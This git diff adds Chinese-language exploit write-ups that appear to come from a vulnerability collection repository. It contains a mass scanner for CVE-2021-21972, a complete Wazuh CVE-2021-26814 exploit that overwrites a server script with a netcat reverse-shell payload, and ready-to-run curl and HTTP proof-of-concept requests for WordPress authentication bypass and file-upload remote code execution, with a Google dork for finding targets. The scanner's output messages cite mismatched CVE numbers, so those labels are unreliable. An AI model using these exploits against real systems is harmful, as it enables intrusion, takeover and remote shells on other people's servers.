+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+http.client.HTTPConnection._http_vsn = 10
+http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+
+TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
+def get_ua():
+ first_num = random.randint(55, 62)
+ third_num = random.randint(0, 3200)
+ fourth_num = random.randint(0, 140)
+ os_type = [
+ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
+ '(Macintosh; Intel Mac OS X 10_12_6)'
+ ]
+ chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
+
+ ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
+ '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
+ )
+ return ua
+
+
+def CVE_2021_21972(url):
+ # proxies = {"scoks5": "http://127.0.0.1:1081"}
+ proxies = {
+ "http": "http://127.0.0.1:8080",
+ "https": "http://127.0.0.1:8080",
+ }
+ headers = {
+ 'User-Agent': get_ua()
+ }
+ # data = base64.b64decode(Payload)
+ # files = {'uploadFile': open('all.tar', 'rb')} #linux
+ files = {'uploadFile': open('test.tar', 'rb')} #win
+ targetUrl = url + TARGET_URI
+ try:
+ res = requests.post(url=targetUrl,
+ headers=headers,
+ files=files,
+ verify=False,
+ proxies=proxies)
+ # proxies={'socks5': 'http://127.0.0.1:1081'})
+ if res.status_code == 200 and "SUCCESS" in res.text:
+ print("[+] URL:{}--------存在CVE-2021-21872漏洞".format(url))
+ # print("[+] Command success result: " + res.text + "\n")
+ with open("存在漏洞地址.txt", 'a') as fw:
+ fw.write(url + '\n')
+ else:
+ print("[-] " + url + " 没有发现CVE-2020-14882漏洞.\n")
+ # except Exception as e:
+ # print(e)
+ except:
+ print("[-] " + url + " Request ERROR.\n")
+def multithreading(filename, pools=5):
+ works = []
+ with open(filename, "r") as f:
+ for i in f:
+ func_params = [i.rstrip("\n")]
+ # func_params = [i] + [cmd]
+ works.append((func_params, None))
+ pool = threadpool.ThreadPool(pools)
+ reqs = threadpool.makeRequests(CVE_2021_21972, works)
+ [pool.putRequest(req) for req in reqs]
+ pool.wait()
+
+def main():
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u",
+ "--url",
+ help="Target URL; Example:http://ip:port")
+ parser.add_argument("-f",
+ "--file",
+ help="Url File; Example:url.txt")
+ # parser.add_argument("-t",
+ # "--tar",
+ # help="Create tar File; Example:test.tar")
+ # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
+ args = parser.parse_args()
+ url = args.url
+ # cmd = args.cmd
+ file_path = args.file
+ # jsp = args.tar
+ # if jsp != None:
+ # print(jsp)
+ # generate_zip(jsp)
+ if url != None and file_path ==None:
+ CVE_2021_21972(url)
+ elif url == None and file_path != None:
+ multithreading(file_path, 10) # 默认15线程
+
+if __name__ == "__main__":
+ main()
+```
+
diff --git a/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md b/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md
new file mode 100644
index 0000000..c60f07f
--- /dev/null
+++ b/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md
@@ -0,0 +1,151 @@
+# Wazuh Manager 代码执行漏洞CVE-2021-26814
+
+## 漏洞描述
+
+Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。
+
+## 漏洞影响
+
+```
+Wazuh Manager v.4.0.0-4.0.3
+```
+
+## 漏洞复现
+
+poc:
+
+```
+PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip
+ DESTIP -tport DESTPORT
+```
+
+```python
+# Exploit Title: Wazuh 4.0.3 API RCE
+# Author: WickdDavid (Davide Meacci)
+# Date: 2021-01-01
+# Vendor Homepage: https://github.com/wazuh/wazuh
+# Version : 4.0.3
+
+
+import requests
+import sys
+import argparse
+import time
+import json
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+
+parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')
+parser.add_argument('-user', dest='username',required=True,
+ help='wazuh API username')
+parser.add_argument('-pwd', dest='password',required=True,
+ help='wazuh API password')
+parser.add_argument('-lip', dest='srcip',required=True,
+ help='listening server')
+parser.add_argument('-lport', dest='srcport',required=True,
+ help='listening port')
+parser.add_argument('-tip', dest='destip',required=True,
+ help='target server ip (wazuh API)')
+parser.add_argument('-tport', dest='destport',required=True,
+ help='target server port (wazuh API)')
+
+
+args = parser.parse_args()
+
+# executed payload may be changed here
+
+exec_payload = """
+import os #:l
+os.system("nc %s %s -e /bin/sh") #:l
+""" % (args.srcip, args.srcport)
+
+
+config_payload = { "drop_privileges": False }
+
+
+proxies = {
+ "http":"http://127.0.0.1:8080",
+ "https":"https://127.0.0.1:8080"
+}
+
+target = "https://%s:%s" % (args.destip,args.destport)
+auth_token = ""
+path_traversal = "etc/lists/../../../../.."
+headers = {}
+
+# step 1 - obtaining auth token
+
+r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False)
+
+if(r.status_code == 200):
+ auth_token = r.text
+ headers["Authorization"] = "Bearer %s" % auth_token
+else:
+ print("[!] No auth code recovered. Check username and password")
+ exit(1)
+
+# step 2 - Privilege Escalation on API (not implemented)
+
+
+# step 3 - Save files to be restored later
+
+file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py"
+print("[+] Saving files to restore later...")
+r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)
+f = open("backup.py","w")
+f.write(json.loads(r.text)["contents"])
+f.close()
+time.sleep(1)
+
+# step 4 - Local Privilege Escalation
+
+print("[+] Changing API config to run as root...")
+r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False)
+time.sleep(1)
+
+# step 5 - Restart server (now api service runs as root)
+
+print("[+] Restarting server...")
+r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
+#print(r.text)
+
+data = {"title":"Bad Request"}
+while "title" in data and "Bad request" in data["title"]:
+ time.sleep(5)
+ try:
+ r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
+ #print(r.text)
+ data = json.loads(r.text)
+ except:
+ continue
+
+# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload
+
+print("[+] Uploading payload...")
+r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)
+#print(r.text)
+time.sleep(1)
+
+# step 7 - Restart server (now malicious payload will be run by the server)
+
+
+print("[+] Restarting API service for the last time...")
+r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
+#print(r.text)
+
+data = {"title":"Bad Request"}
+while "title" in data and "Bad request" in data["title"]:
+ time.sleep(5)
+ try:
+ r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
+ #print(r.text)
+ data = json.loads(r.text)
+ except:
+ continue
+
+
+print("[+] Payload executed, check your shell now.")
+print("[+] Remember to restore changed file (check local backup file)")
+```
+
diff --git a/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md b/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md
new file mode 100644
index 0000000..169eb93
--- /dev/null
+++ b/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md
@@ -0,0 +1,42 @@
+# WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
+
+## 漏洞描述
+
+未经身份验证的用户可以使用"theplus_ajax_login"和"theplus_google_ajax_register" Ajax请求,通过仅提供相关的用户名,就可以像任何用户一样轻松地进行身份验证。
+
+参考链接:
+
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175
+- https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89
+
+## 漏洞影响
+
+```
+Elementor Page Builder <4.1.7
+```
+
+## 漏洞复现
+
+poc:
+
+```
+curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
+curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
+```
+
+"theplus_google_ajax_register" AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的帐户,例如admin,然后登录。
+
+html:
+
+```html
+
+```
+
diff --git a/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md b/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md
new file mode 100644
index 0000000..b0c5000
--- /dev/null
+++ b/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md
@@ -0,0 +1,41 @@
+# WordPress File Manager<6.9 RCE CVE-2020-25213
+
+## 漏洞复现
+
+poc:
+
+```
+curl -ks --max-time 5 -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@/$file_upload" "hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
+```
+
+```
+POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
+Content-Length: 631
+Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801
+Connection: close
+
+--------------------------9689147a5989a801
+Content-Disposition: form-data; name="reqid"
+
+17457a1fe6959
+--------------------------9689147a5989a801
+Content-Disposition: form-data; name="cmd"
+
+upload
+--------------------------9689147a5989a801
+Content-Disposition: form-data; name="target"
+
+l1_Lw
+--------------------------9689147a5989a801
+Content-Disposition: form-data; name="mtime[]"
+
+1576045135
+--------------------------9689147a5989a801
+Content-Disposition: form-data; name="upload[]"; filename="1.php"
+Content-Type: application/octet-stream
+
+
+
+--------------------------9689147a5989a801--
+```
+
diff --git a/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md b/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md
new file mode 100644
index 0000000..23c9413
--- /dev/null
+++ b/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md
@@ -0,0 +1,71 @@
+# WordPress SuperForms 4.9 任意文件上传到远程代码执行
+
+## 漏洞描述
+
+SuperForms官方链接:https://renstillmann.github.io/super-forms/#/
+
+参考链接:
+
+- https://www.exploit-db.com/exploits/49490
+
+## 漏洞影响
+
+```
+All (<= 4.9.X)
+```
+
+## Google Dork
+
+```
+inurl:"/wp-content/plugins/super-forms/"
+```
+
+## 漏洞复现
+
+poc:
+
+```
+POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
+ <=== exploit end point
+Host: localhost
+User-Agent: UserAgent
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------423513681827540048931513055996
+Content-Length: 7058
+Origin: localhost
+Connection: close
+Referer: localhost
+Cookie:
+
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="accept_file_types"
+
+jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
+inject extension (|PHP4) to validate file to upload
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="max_file_size"
+
+8000000
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="image_library"
+
+0
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="files[]";
+filename="filename.(extension)" <==== inject code extension (.php4)
+for example
+Content-Type: application/pdf
+
+Evil codes to be uploaded
+
+-----------------------------423513681827540048931513055996--
+
+# Uploaded Malicious File can be Found in :
+/wp-content/uploads/superforms/2021/01//filename.php4
+u can get from server reply .
+```
+
diff --git a/服务器应用漏洞/images/16142224147525.jpg b/服务器应用漏洞/images/16142224147525.jpg
new file mode 100644
index 0000000..9e38f82
Binary files /dev/null and b/服务器应用漏洞/images/16142224147525.jpg differ
diff --git a/服务器应用漏洞/images/image-20221207141353136.png b/服务器应用漏洞/images/image-20221207141353136.png
new file mode 100644
index 0000000..946d38d
Binary files /dev/null and b/服务器应用漏洞/images/image-20221207141353136.png differ
diff --git a/服务器应用漏洞/images/image-20221207141859357.png b/服务器应用漏洞/images/image-20221207141859357.png
new file mode 100644
index 0000000..4df9ee3
Binary files /dev/null and b/服务器应用漏洞/images/image-20221207141859357.png differ